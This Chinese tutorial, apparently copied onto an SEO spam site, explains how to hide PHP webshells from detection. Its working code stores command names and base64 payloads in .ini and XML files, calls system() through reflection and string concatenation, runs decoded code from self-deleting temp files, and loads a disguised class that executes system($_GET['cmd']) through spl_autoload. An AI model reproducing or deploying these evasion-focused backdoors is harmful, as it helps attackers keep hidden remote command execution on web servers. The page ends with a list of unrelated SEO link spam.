当前位置: 首页 > wzjs >正文

织梦收费百度seo外链推广教程

织梦收费,百度seo外链推广教程,建筑企业信息查询平台,企业网站建设综合实训心得体会一千字前言 PHP 作为广泛使用的服务端语言,其灵活的内置类(如 DOMDocument)和文件操作机制(.ini、.inc 的自动加载),为攻击者提供了天然的隐蔽通道。通过 动态函数拼接、反射调用、加密混淆 和 伪命名空间 等手法…

前言

PHP 作为广泛使用的服务端语言,其灵活的内置类(如 DOMDocument)和文件操作机制(.ini.inc 的自动加载),为攻击者提供了天然的隐蔽通道。通过 动态函数拼接反射调用加密混淆伪命名空间 等手法,恶意代码得以“寄生”于正常的业务逻辑中,甚至借助析构函数、自动加载等机制实现 无文件化触发。这种“隐写术”般的攻击方式,不仅挑战了传统检测技术的边界,也对开发者和安全团队提出了更高维度的防御要求。

本文将以 PHP 内置类与文件操作 为核心,深度剖析攻击者如何将 XML 解析、配置加载、自动包含等“合法”功能武器化,构建出零特征、高动态的免杀 WebShell。

利用parse_ini_file函数

PHP中有一个名为parse_ini_file的函数,用于解析.ini文件 , 如果Webshell的代码隐藏在.ini文件的某些配置项中,然后通过解析这些配置项来动态执行代码。

动态函数调用 + 反射执行

创建一个.ini文件,其中包含恶意代码的字符串

// [payload]
// func_name = "system"
// encoded_cmd = "d2hvYW1p"  // base64("whoami")

代码:

class ConfigLoader {private $config;public function __construct($file) {$this->config = parse_ini_file($file, true); // 解析 .ini 文件$this->execute();}private function execute() {$func = $this->config['payload']['func_name'];$cmd = base64_decode($this->config['payload']['encoded_cmd']);// 使用反射动态调用函数$reflection = new ReflectionFunction($func);$reflection->invoke($cmd);}
}new ConfigLoader('config.ini'); // 触发执行
  • 敏感函数名(system)和指令(whoami)均存储在 .ini 文件中,避免代码硬编码。
  • 使用 反射(ReflectionFunction) 间接调用函数,绕过静态检测。
临时文件写入 + 包含执行

.ini文件

[payload]
encoded_code = "PD9waHAgc3lzdGVtKCd3aG9hbWknKTsgPz4="
<?
class TempFileExecutor {private $code;public function __construct($iniFile) {$config = parse_ini_file($iniFile);$this->code = base64_decode($config['encoded_code']);$this->run();}private function run() {$tempFile = tempnam(sys_get_temp_dir(), 'tmp_');file_put_contents($tempFile, $this->code);include $tempFile;    // 包含临时文件执行代码unlink($tempFile);    // 清理痕迹}
}new TempFileExecutor('evil.ini');

利用spl_autoload 函数

函数定义
spl_autoload(string $class_name, string $file_extensions = null): void
  • 参数

  • $class_name:需要加载的类名。

  • $file_extensions(可选):指定文件扩展名(如 .php,.inc),默认使用 include_path 中的配置。

行为逻辑
  1. 将类名 $class_name 转换为小写(若系统区分大小写则保留原大小写)。
  2. $file_extensions 指定的扩展名,在 include_path 目录下查找文件。
  3. 找到文件后自动包含(include_once)该文件。

1.inc文件

<?php system("whoami"); ?>

1.php

<?php spl_autoload("1"); ?>
  1. spl_autoload("1") 尝试加载类名为 nb 的文件。
  2. 按默认规则查找 nb.php1.inc,发现 1.inc 存在。
  3. 包含 1.inc 并执行 webshell,输出服务器配置信息。

关键点

  • spl_autoload 不仅用于加载类,直接调用时也可触发文件包含
  • 文件扩展名(.inc)和类名(1)需匹配,但文件内容无需严格包含类定义。
伪装类文件 + 动态执行

payload.inc

<?php
class Payload { // 伪装成合法类public static function run() {system($_GET['cmd']); // 恶意代码}
}

1.php

<?php
spl_autoload("payload"); // 加载 Payload 类
if (class_exists('Payload')) {Payload::run(); // 触发恶意代码
}

利用DOMDocument类

DOMDocument 是 PHP 中用于处理 XMLHTML 文档的核心类。它基于 W3C 的 DOM(Document Object Model)标准,提供了一套完整的 API,允许开发者以树形结构操作文档节点(如元素、属性、文本等)。,支持XPath查询和动态节点解析 (php版本>8.0)

常用方法

方法名功能说明示例
createElement($name, $value)创建元素节点$element = $dom->createElement('tag', 'content')
createAttribute($name)创建属性节点$attr = $dom->createAttribute('id')
getElementsByTagName($name)通过标签名获取节点列表$items = $dom->getElementsByTagName('item')
getElementById($id)通过 ID 获取单个元素(需 DTD 验证)$node = $dom->getElementById('main')
saveHTML()输出 HTML 格式字符串(处理 HTML 文档时)$html = $dom->saveHTML()
validate()验证文档是否符合 DTD/XSDif ($dom->validate()) { ... }

解析 XML 数据

<?php
$xml = <<<XML
<?xml version="1.0"?>
<books><book id="1"><title>PHP Basics</title><author>John Doe</author></book>
</books>
XML;$dom = new DOMDocument();
$dom->loadXML($xml);// 遍历所有 <book> 节点
foreach ($dom->getElementsByTagName('book') as $book) {$title = $book->getElementsByTagName('title')->item(0)->nodeValue;$author = $book->getElementsByTagName('author')->item(0)->nodeValue;echo "Title: $title, Author: $author\n";
}

输出:

这里我们可以提取xml里面各节点的内容,这样的话,我们就可以把恶意字符串隐藏在xml文件里面

<?php
// 恶意 XML 数据(可远程加载或硬编码)
$xml = <<<XML
<root><data>whoami</data>
</root>
XML;$doc = new DOMDocument();
$doc->loadXML($xml);  // 解析 XML
$xpath = new DOMXPath($doc);
$node = $xpath->query('//data')->item(0); // 提取节点值// 动态调用高危函数(避免直接写 system)
$func = 'sys' . 'tem';
$func($node->nodeValue);  // 执行系统命令
?>

将恶意字符串完全隐藏在 XML 文件中

1.xml

<?xml version="1.0" encoding="UTF-8"?>
<config><!-- 函数名分块存储 --><function><part>sys</part><part>tem</part></function><!-- 参数使用 Base64 编码 --><data>d2hvYW1p</data> <!-- Base64("whoami") -->
</config>

1.php

<?php
// 加载外部 XML 文件(可替换为远程 URL)
$xml = file_get_contents('malicious.xml');// 解析 XML
$doc = new DOMDocument();
$doc->loadXML($xml);
$xpath = new DOMXPath($doc);// 提取分块函数名并拼接
$funcParts = $xpath->query('//function/part');
$func = '';
foreach ($funcParts as $part) {$func .= $part->nodeValue; // 拼接为 "system"
}// 提取并解码参数
$dataNode = $xpath->query('//data')->item(0);
$arg = base64_decode($dataNode->nodeValue); // 解码为 "whoami"// 动态调用(增加安全验证)
if ($func && $arg && function_exists($func)) {($func)($arg); // 执行 system("whoami")
} else {error_log("配置错误或函数不可用"); // 伪装成普通错误日志
}
?>

http://www.dtcms.com/wzjs/49137.html

相关文章:

  • 自己怎么做直播网站吗自己做网站
  • 网站设计 网站开发 优化洛阳网站seo
  • 茂名市城市建设档案馆网站关键词查询爱站网
  • 网站建设价格热线友情链接英语
  • 西安东郊网站建设公司免费b站推广网站入口2020
  • 网站建设方案书生鲜港港网app下载最新版
  • 网站建设 三网站长工具官网域名查询
  • 建设通类型的网站网上怎么推广产品
  • 怎么自己做APP网站热门关键词查询
  • 玉环做网站找那家公司新媒体营销推广公司
  • 如何用代码制作网站四川seo
  • 找人做网站设计 哪个平台可以找百度推广竞价排名
  • 图书网站建设规划书网络营销有哪些
  • 微信做淘宝优惠券但网站是怎么建设但站长工具app下载
  • 大学网站建设多少钱焊工培训心得体会
  • dedecms网站邮件程序企业模板建站
  • 邢台做网站的公司济南网络seo公司
  • wordpress默认账号密码忘记搜索引擎优化核心
  • 网站建设优质公司全球网站排名查询网
  • 手机网站开发教程谷歌seo推广培训班
  • 广州疫情被中央点名seo引擎优化工具
  • 哪个网站做漂流瓶任务有没有自动排名的软件
  • wordpress分类列表前加图标站长工具seo综合查询访问
  • 网站开发 弹窗seo培训公司
  • 宁波品牌网站设计特点文山seo
  • 互动创意网站怎么免费给自己建网站
  • 注册电商平台需要什么手续seo流量的提升的软件
  • phpcms 网站名称标签电商平台网站
  • 大型网站许多网站如何弄一个自己的网站
  • wordpress制作小说站教程东莞网站营销策划